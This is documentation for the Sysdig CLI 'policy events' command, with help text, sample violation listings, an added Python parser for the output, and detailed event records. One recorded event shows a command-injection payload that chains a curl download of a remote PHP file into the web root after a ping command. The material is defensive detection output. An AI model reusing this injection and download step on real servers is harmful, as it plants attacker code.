Sysdig Platform CLI - Runtime Policies Events
This section explains the concepts and notation used by the Secure Runtime Policy Events commands.
Usage
The runtime policy events commands retrieve policy violation events and image scanning violation events through the CLI. The available options are:
$ sdc-cli policy events --help
Usage: sdc-cli policy events [OPTIONS] [EVENT_ID]

Options:
  --duration TEXT   Duration to display the events from. The minimum is 10
                    minutes. (ex: 30M, 1H, 3D, 2W). Default 3D.
  --scope TEXT      this is a Sysdig Monitor-like filter (e.g
                    'kubernetes.cluster.name in ("prod", "dev")'). When
                    provided, events are filtered by their scope, so only a
                    subset will be returned (e.g.
                    'container.image.repo="ubuntu"' will provide only events
                    that have happened on an ubuntu container).
  --severity TEXT   Filter by severity. Valid ones are: 'high', 'med', 'low',
                    'info'. Multiple ones can be specified if separated by
                    commas. (e.g. 'med,low,info')
  --type TEXT       Filter by event originator. Valid ones are: 'scanning',
                    'policy'. Multiple ones can be specified if separated by
                    commas. (e.g. 'scanning,policy')
  --search TEXT     Search by event title or label
  --limit INTEGER   Limit the amount of events retrieved. Default: 50
  --help            Show this message and exit.
Example: Retrieve all the events in the last 3 days (Default behavior)
$ sdc-cli policy events
id name severity type date
164a1efbd97c97ed366d946511fd9e28 Terminal shell in container HIGH policy 2020-11-23 11:18:04 UTC
164a1ec3f9e5a15ffb6a46a65184b58e Launch Suspicious Network Tool in Container MED policy 2020-11-23 11:14:04 UTC
164a1bd329805200bdc62af13ba144fb Ingress Object Without TLS Cert Created LOW policy 2020-11-23 10:20:10 UTC
164a14ff18ad1b008e4c6c167b65cecf Create/Modify Configmap With Private Credentials HIGH policy 2020-11-23 08:15:02 UTC
164a0d5d70051dc9cf79e61657460c82 Access Cryptomining Network HIGH policy 2020-11-23 05:55:12 UTC
164a0d5d6a4bf8dd1b5da9e35168e3b9 Access Cryptomining Network HIGH policy 2020-11-23 05:55:11 UTC
164a0d5d55825ecf8f90976340313343 Access Cryptomining Network HIGH policy 2020-11-23 05:55:11 UTC
1649f775c744549151a394645659f21c Unscanned Image - k8s.gcr.io/metrics-server-amd64:v0.3.6 MED scanning 2020-11-22 23:13:47 UTC
1649f775c729d548f10545b71c590bea Unscanned Image - gke.gcr.io/k8s-dns-dnsmasq-nanny-amd64:1.15.13 MED scanning 2020-11-22 23:13:47 UTC
1649f775c70de4d09f0d63633cc01cdf Unscanned Image - gke.gcr.io/k8s-dns-dnsmasq-nanny-amd64:1.15.13 MED scanning 2020-11-22 23:13:47 UTC
1649f72fe141e0c1b4828da46583eab6 Unscanned Image - k8s.gcr.io/ingress-gce-404-server-with-metrics-amd64:v1.6.0 MED scanning 2020-11-22 23:08:47 UTC
1649f65e84ef26346164e19e6fb9c4e1 Unscanned Image - gke.gcr.io/k8s-dns-sidecar-amd64:1.15.13 MED scanning 2020-11-22 22:53:47 UTC
1649f65e84d0267542d226ef875ef045 Unscanned Image - gke.gcr.io/k8s-dns-sidecar-amd64:1.15.13 MED scanning 2020-11-22 22:53:47 UTC
1649f58cd568a61360e226fa01904700 Unscanned Image - gke.gcr.io/addon-resizer:1.8.8-gke.1 MED scanning 2020-11-22 22:38:47 UTC
1649f4430c0cebace243051a3ac2fdbb Sensitive Info Exfiltration HIGH policy 2020-11-22 22:15:10 UTC
1649f12f3ff2e98d4ec479cba092d355 Unscanned Image - 9999999.dkr.ecr.us-east-1.amazonaws.com/amazon-k8s-cni:v1.5.4 MED scanning 2020-11-22 21:18:47 UTC
1649f12f3fcd5e0c0c54b1495a38485d Unscanned Image - 9999999.dkr.ecr.us-east-1.amazonaws.com/amazon-k8s-cni:v1.5.4 MED scanning 2020-11-22 21:18:47 UTC
1649ebffc8ddf8cc82aa4675a9f8c1e9 Unscanned Image - docker.io/protokube:1.17.0 MED scanning 2020-11-22 19:43:45 UTC
1649ebffc8c5f40a2a379079c0a9f327 Unscanned Image - docker.io/protokube:1.17.0 MED scanning 2020-11-22 19:43:45 UTC
1649ebffc8a77988c30145176d5050ad Unscanned Image - docker.io/protokube:1.17.0 MED scanning 2020-11-22 19:43:45 UTC
1649ebffc887b8991b08f685e450b54f Unscanned Image - docker.io/protokube:1.17.0 MED scanning 2020-11-22 19:43:45 UTC
1649ea5cf830ddf6464124d08f04f606 Unscanned Image - 9999999.dkr.ecr.us-east-1.amazonaws.com/eks/coredns:v1.3.1 MED scanning 2020-11-22 19:13:47 UTC
1649ea5cf81319e50f099c621efc05ba Unscanned Image - 9999999.dkr.ecr.us-east-1.amazonaws.com/eks/coredns:v1.3.1 MED scanning 2020-11-22 19:13:47 UTC
1649d067a438b1227948f4d50a88ffc3 Terminal shell in container HIGH policy 2020-11-22 11:18:05 UTC
1649d02f9c831e8f00770de4a0f05048 Launch Suspicious Network Tool in Container MED policy 2020-11-22 11:14:05 UTC
1649cd3ca0b15f0089821ebfd2178603 Ingress Object Without TLS Cert Created LOW policy 2020-11-22 10:20:02 UTC
1649c66b12f0a300d69bec3c2c9871c0 Create/Modify Configmap With Private Credentials HIGH policy 2020-11-22 08:15:05 UTC
1649bec6d2fad406fd0a0b982867a325 Access Cryptomining Network HIGH policy 2020-11-22 05:55:03 UTC
1649a5ae6d64e86477dbc151e3fd7ba3 Sensitive Info Exfiltration HIGH policy 2020-11-21 22:15:10 UTC
164981d3270cd0735c9daf4fd63c2783 Terminal shell in container HIGH policy 2020-11-21 11:18:06 UTC
1649819b3d26d40c9bab771b8816c07c Launch Suspicious Network Tool in Container MED policy 2020-11-21 11:14:05 UTC
16497ea826d27a009fc85c9c04d59f14 Ingress Object Without TLS Cert Created LOW policy 2020-11-21 10:20:02 UTC
164977d68e0c6c00c4916f6df64c99c1 Create/Modify Configmap With Private Credentials HIGH policy 2020-11-21 08:15:05 UTC
164975099c19932f6f7915cb45fd53d3 Unscanned Image - docker.io/sysdiglabs/cloud-connector:master MED scanning 2020-11-21 07:23:46 UTC
16497032b1adf7bae439b390a10d1272 Access Cryptomining Network HIGH policy 2020-11-21 05:55:05 UTC
16497032acabef4c64b261c8abac3ad7 Access Cryptomining Network HIGH policy 2020-11-21 05:55:05 UTC
1649703297555ffbbb26d86292158f5f Access Cryptomining Network HIGH policy 2020-11-21 05:55:04 UTC
16495719cebcbfef875e97ef70bba8b4 Sensitive Info Exfiltration HIGH policy 2020-11-20 22:15:10 UTC
16494d5669cd451de0f44661098cf845 AWS CloudTrail security event HIGH policy 2020-11-20 19:16:15 UTC
16494cd8af04d106ca46379d53acc0ac AWS CloudTrail security event HIGH policy 2020-11-20 19:07:15 UTC
Example: Retrieve only the events from the last 6 hours
$ sdc-cli policy events --duration 6H
id name severity type date
164a1efbd97c97ed366d946511fd9e28 Terminal shell in container HIGH policy 2020-11-23 11:18:04 UTC
Example: Retrieve only the last 5 policy violation events
$ sdc-cli policy events --type policy --limit 5
id name severity type date
164a1efbd97c97ed366d946511fd9e28 Terminal shell in container HIGH policy 2020-11-23 11:18:04 UTC
164a1ec3f9e5a15ffb6a46a65184b58e Launch Suspicious Network Tool in Container MED policy 2020-11-23 11:14:04 UTC
164a1bd329805200bdc62af13ba144fb Ingress Object Without TLS Cert Created LOW policy 2020-11-23 10:20:10 UTC
164a14ff18ad1b008e4c6c167b65cecf Create/Modify Configmap With Private Credentials HIGH policy 2020-11-23 08:15:02 UTC
164a0d5d70051dc9cf79e61657460c82 Access Cryptomining Network HIGH policy 2020-11-23 05:55:12 UTC
Example: Filter by name or description
$ sdc-cli policy events --search Terminal
id name severity type date
164a1efbd97c97ed366d946511fd9e28 Terminal shell in container HIGH policy 2020-11-23 11:18:04 UTC
1649d067a438b1227948f4d50a88ffc3 Terminal shell in container HIGH policy 2020-11-22 11:18:05 UTC
164981d3270cd0735c9daf4fd63c2783 Terminal shell in container HIGH policy 2020-11-21 11:18:06 UTC
Example: Retrieve only the last 8 high and medium severity events
$ sdc-cli policy events --severity high,med --limit 8
id name severity type date
164a1efbd97c97ed366d946511fd9e28 Terminal shell in container HIGH policy 2020-11-23 11:18:04 UTC
164a1ec3f9e5a15ffb6a46a65184b58e Launch Suspicious Network Tool in Container MED policy 2020-11-23 11:14:04 UTC
164a14ff18ad1b008e4c6c167b65cecf Create/Modify Configmap With Private Credentials HIGH policy 2020-11-23 08:15:02 UTC
164a0d5d70051dc9cf79e61657460c82 Access Cryptomining Network HIGH policy 2020-11-23 05:55:12 UTC
164a0d5d6a4bf8dd1b5da9e35168e3b9 Access Cryptomining Network HIGH policy 2020-11-23 05:55:11 UTC
164a0d5d55825ecf8f90976340313343 Access Cryptomining Network HIGH policy 2020-11-23 05:55:11 UTC
1649f775c744549151a394645659f21c Unscanned Image - k8s.gcr.io/metrics-server-amd64:v0.3.6 MED scanning 2020-11-22 23:13:47 UTC
1649f775c729d548f10545b71c590bea Unscanned Image - gke.gcr.io/k8s-dns-dnsmasq-nanny-amd64:1.15.13 MED scanning 2020-11-22 23:13:47 UTC
Example: Apply custom filtering
$ sdc-cli policy events --scope 'kubernetes.cluster.name="prod" and kubernetes.namespace.name="frontend"'
id name severity type date
1649f4430c0cebace243051a3ac2fdbb Sensitive Info Exfiltration HIGH policy 2020-11-22 22:15:10 UTC
1649a5ae6d64e86477dbc151e3fd7ba3 Sensitive Info Exfiltration HIGH policy 2020-11-21 22:15:10 UTC
16495719cebcbfef875e97ef70bba8b4 Sensitive Info Exfiltration HIGH policy 2020-11-20 22:15:10 UTC
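As an added example (not part of sdc-cli or of this page's original content), the following Python turns the listing output shown above into structured records for triage: it validates a --duration value against the form documented in the help text (30M, 1H, 3D, 2W; minimum 10 minutes), parses the id/name/severity/type/date rows, and collapses repeated firings of the same rule into a count with the latest timestamp. The sample output is constructed from rows shown above; parse_events, duration_to_minutes and summarize are hypothetical helper names.

```python
import re
from datetime import datetime, timezone

# Constructed sample in the shape of the `sdc-cli policy events` listing (rows copied from above).
SAMPLE_OUTPUT = """\
id name severity type date
164a1efbd97c97ed366d946511fd9e28 Terminal shell in container HIGH policy 2020-11-23 11:18:04 UTC
1649f775c744549151a394645659f21c Unscanned Image - k8s.gcr.io/metrics-server-amd64:v0.3.6 MED scanning 2020-11-22 23:13:47 UTC
164a0d5d70051dc9cf79e61657460c82 Access Cryptomining Network HIGH policy 2020-11-23 05:55:12 UTC
164a0d5d6a4bf8dd1b5da9e35168e3b9 Access Cryptomining Network HIGH policy 2020-11-23 05:55:11 UTC
"""

# Rule names contain spaces, so anchor on the fixed-format columns at both ends of the row.
ROW_RE = re.compile(
    r"^(?P<id>[0-9a-f]{32}) (?P<name>.+?) (?P<severity>HIGH|MED|LOW|INFO) "
    r"(?P<type>policy|scanning) (?P<date>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) UTC$"
)

def parse_events(text):
    """Turn listing lines into dicts; the header and any non-matching line are skipped."""
    events = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            ev = m.groupdict()
            ev["date"] = datetime.strptime(ev["date"], "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
            events.append(ev)
    return events

def duration_to_minutes(spec):
    """Validate a --duration value as documented: <number><M|H|D|W>, minimum 10 minutes."""
    m = re.fullmatch(r"(\d+)([MHDW])", spec)
    if not m:
        raise ValueError(f"bad duration {spec!r}: expected e.g. 30M, 1H, 3D, 2W")
    minutes = int(m.group(1)) * {"M": 1, "H": 60, "D": 1440, "W": 10080}[m.group(2)]
    if minutes < 10:
        raise ValueError(f"{spec} is below the 10 minute minimum")
    return minutes

def summarize(events, event_type=None, min_severity="LOW"):
    """Collapse repeated firings of one rule (count, severity, latest time), with optional type and severity floor."""
    rank = {"INFO": 0, "LOW": 1, "MED": 2, "HIGH": 3}
    summary = {}
    for e in events:
        if (event_type and e["type"] != event_type) or rank[e["severity"]] < rank[min_severity]:
            continue
        s = summary.setdefault(e["name"], {"count": 0, "severity": e["severity"], "latest": e["date"]})
        s["count"] += 1
        s["latest"] = max(s["latest"], e["date"])
    return summary
```

Feeding the real CLI output to parse_events (for example via subprocess) and calling summarize(events, event_type="policy", min_severity="HIGH") gives a per-rule count suitable for a shift handoff instead of one line per firing.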
Example: Retrieve more info from a policy event
$ sdc-cli policy events 1649f4430c0cebace243051a3ac2fdbb
id: 1649f4430c0cebace243051a3ac2fdbb
name: Sensitive Info Exfiltration
description: Web server accessing forbidden directory
date: 2020-11-22 22:15:10 UTC
type: policy
severity: HIGH
output: Writig to forbidden directory (user=www-data command=sh -c ping -c 3 localhost; curl https://gist.githubusercontent.com/bencer/9e32fb1af89754b4ad8346b13dcd1110/raw/cd79134f420b59e84e6b60be3bdff7ca0bb42f1e/gistfile1.txt > /var/www/html/dump.php file=/var/www/html/dump.php)
tags: filesystem
fields:
falco.rule Apache writing to non allowed directory
fd.name /var/www/html/dump.php
proc.cmdline sh -c ping -c 3 localhost; curl https://gist.githubusercontent.com/bencer/9e32fb1af89754b4ad8346b13dcd1110/raw/cd79134f420b59e84e6b60be3bdff7ca0bb42f1e/gistfile1.txt > /var/www/html/dump.php
proc.name sh
user.name www-data
labels:
agent.tag.role cluster
container.image.digest sha256:74941e12721385c8f3d5b9438294eae9050087badfc8c4c9e67195d098e40e11
container.image.id 5e8b2f0509f4
container.image.repo sysdiglabs/workshop-forensics-1-phpping
container.image.tag 0.1
container.label.io.kubernetes.container.name frontend
container.label.io.kubernetes.pod.name frontend-7588976944-b8tmm
container.label.io.kubernetes.pod.namespace frontend
container.name k8s_frontend_frontend-7588976944-b8tmm_frontend_77dcd8da-fac3-46d6-88cb-554557b8812c_0
host.hostName ip-172-20-42-99
host.mac 02:61:ce:1c:1d:29
kubernetes.cluster.name prod
kubernetes.deployment.name frontend
kubernetes.namespace.name frontend
kubernetes.node.name ip-172-20-42-99.ec2.internal
kubernetes.pod.name frontend-7588976944-b8tmm
kubernetes.replicaSet.name frontend-7588976944
kubernetes.service.name php
process.name sh -c ping -c 3 localhost; curl https://gist.githubusercontent.com/bencer/9e32fb1af89754b4ad8346b13dcd1110/raw/cd79134f420b59e84e6b60be3bdff7ca0bb42f1e/gistfile1.txt > /var/www/html/dump.php
Example: Retrieve more info from a scanning event
$ sdc-cli policy events 1649f775c729d548f10545b71c590bea
id: 1649f775c729d548f10545b71c590bea
name: Unscanned Image - gke.gcr.io/k8s-dns-dnsmasq-nanny-amd64:1.15.13
description:
date: 2020-11-22 23:13:47 UTC
type: scanning
severity: MED
output:
tags:
image:
digest sha256:1eba77c751b7b25c9af97c23c857f3a7024253224d256b8648b0d86cddda5074
id c84ca8f78ee6
registry gke.gcr.io
repo k8s-dns-dnsmasq-nanny-amd64
tag 1.15.13
labels:
agent.tag.cluster staging
agent.tag.role cluster
agent.tag.sysdig_secure.enabled true
container.image.repo gke.gcr.io/k8s-dns-dnsmasq-nanny-amd64
container.image.tag 1.15.13
container.label.io.kubernetes.container.name dnsmasq
container.label.io.kubernetes.pod.name kube-dns-869d587df7-8mfxn
container.label.io.kubernetes.pod.namespace kube-system
container.name k8s_dnsmasq_kube-dns-869d587df7-8mfxn_kube-system_2b3874ce-bc6a-439f-bcfb-82758ec6da55_0
host.hostName gke-staging-default-pool-f141e1d0-vsb0
host.ip.private 10.128.0.11, 169.254.123.1
host.ip.public
host.mac 42:01:0a:80:00:0b
kubernetes.cluster.name staging
kubernetes.deployment.name kube-dns
kubernetes.namespace.name kube-system
kubernetes.pod.name kube-dns-869d587df7-8mfxn
kubernetes.replicaSet.name kube-dns-869d587df7